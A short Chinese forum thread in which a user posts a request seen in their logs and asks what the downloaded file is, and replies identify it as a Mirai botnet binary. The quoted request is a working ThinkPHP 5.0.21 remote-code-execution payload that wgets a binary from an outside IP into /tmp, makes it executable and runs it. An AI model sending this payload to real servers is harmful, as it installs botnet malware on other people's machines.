这是一个创建于 1524 天前的主题,其中的信息可能已经有所发展或是发生改变。
http://5.182.210.129/bins/sora.x86 请不要点击执行。
"GET /thinkphp_5.0.21/?s=index/%5Cthink%5Capp/invkefunction &function=call_user_func_array &vars[0]=system &vars[1][]=cd%20/tmp; wget%20http://5.182.210.129/bins/sora.x86; cat%20sora.x86%20%3E%20xdsf; chmod%20777%20xdsf; ./xdsf%20 thinkphp HTTP/1.0", 这种是全网试么? 利用 thinkPhp 漏洞,远程执行代码?
问题来了,这个 exe sora.x86 里面究竟是什么?
 | 1 opengps 2021-09-27 20:15:31 +08:00 “请不要点击执行”一定会有人执行的 |
 | 2 leloext 2021-09-27 20:53:47 +08:00 mirai 后门 |
 | 3 crab 2021-09-27 21:20:22 +08:00 upx 壳 elf linux 上的? |
 | 4 andy1ee11o2 2021-09-27 21:55:05 +08:00 Mirai Botnet |
 | 5 urmyfaith OP 有人分析过? |
Select Language